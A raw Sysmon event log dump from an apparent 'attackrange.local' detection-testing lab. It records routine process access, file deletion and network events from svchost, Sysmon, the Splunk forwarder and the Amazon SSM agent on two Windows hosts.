08:02:36.529{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083607Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:36.529{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083606Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:36.529{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083605Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:36.529{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083604Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:36.529{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083603Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:36.529{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083602Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:36.529{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083601Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:36.529{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083600Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:36.529{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083599Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:36.529{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B51C-615A-9B01-00000000FD01}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083598Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:36.529{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B51C-615A-9B01-00000000FD01}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083597Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:36.530{2FDD8D40-B51C-615A-9B01-00000000FD01}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083596Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:36.451{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CB3877A93379B03A41121621DE7E98B,SHA256=B3BB220F040F50E29B8BC864BC097CFC2B8B9DFF958E32232D97DD8E4BBBFBF5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107688Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:35.061{58E9C193-ACA7-615A-1400-00000000FC01}940C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudpfalsefalse10.0.1.14win-dc-639.attackrange.local123ntpfalse10.0.1.15-123ntp 23542300x8000000000000000107687Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:36.321{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3592A1697A54BF6CA79EB430331943A4,SHA256=2D2512D15054DDB15D1856818BAEF071CC25136466AA1B6A521EF03DC75E5FA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083615Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:37.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9489862530D51E6C061F51CC42268E87,SHA256=CA64892DAC9650BA15226E509050A80994B39F79B469DD94DAC56B68D700CA56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083614Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:37.466{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC1C1D26BC37086F03B52EAFDA99FDEC,SHA256=6014D37C59FA6116579FDCA96B84E63EF81169909D5DA6E15E2D02AAB4AAFFE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107689Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:37.340{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3474035A8038199676AAC56E568D075,SHA256=1FCEBCD73C2E63B7AC185B56AD8BFDF169B64D27C22D3115088EC04318BE19F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107690Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:38.357{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24002E6FDE3F185D2CBD0CCEFF66770C,SHA256=6EF0E475D4A0576DFDEBAD5AE7EF26D122DA4D8C0C664C4691B404A7CFA7B4D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083616Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:38.498{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3045E292A1C6F8A7034BC70FE9C8143,SHA256=2FFEC22D1FCDC12FF4B1282148D3A7B27203DCB315EE23DE5C39BD0AD60C31DD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107693Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:38.416{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51926-false10.0.1.12-8000- 23542300x8000000000000000107692Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:39.437{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5732685BC780AEBB90FFBB54EAA2AE0F,SHA256=AF66A95A0310FBF089DBEDB6B4F3C1E3CA316B7BB28F11C8F529FD111B72611F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083617Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:39.498{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E23D5065FEF23C886553A242DC49447,SHA256=A699D769C85B8EA7223C51359E1B9843FC0BEC1ACE2B0857274450A4292585CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107691Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:39.090{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\respondent-20211004072647-034MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083618Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:40.560{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FE84E562916D44242CB64DB780AEE53,SHA256=F9502D2067EB040FD573035C6F1AEDAD6165BE516F67AEF55F7EDB2762876BBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107699Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:40.472{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E9FDA9CE2854EFB39792948736DEC6B,SHA256=FBABAA249F1EFCDC3558B788D8992EE4A5714AB9C43BB17408A865A81C52841F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107698Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:40.135{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2C00-00000000FC01}2292C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107697Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:40.135{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2C00-00000000FC01}2292C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107696Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:40.133{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2C00-00000000FC01}2292C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107695Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:40.133{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2C00-00000000FC01}2292C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000107694Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:40.104{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\surveyor-20211004072645-035MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083620Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:41.576{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6820BF8FECE8F770804FBF10E3AA14FF,SHA256=18AA50437B44E38A5058A9F587163C317EED25737C02A83CA196A6F62805C8B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107700Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:41.487{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=840599F69B229817FB29C6714F194A9C,SHA256=EB179D337413FDB59A14A0C20123A4C12936191DCE9C60886A0BA1EFC72B67F6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083619Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:37.772{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50179-false10.0.1.12-8000- 23542300x8000000000000000107701Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:42.517{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A7D506E1A378E1E365A3473DA219676,SHA256=162866B656ACB2D699E902B26533AB91CFA9BEA4389376D93FC5EA8EC13F76D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083621Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:42.607{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program 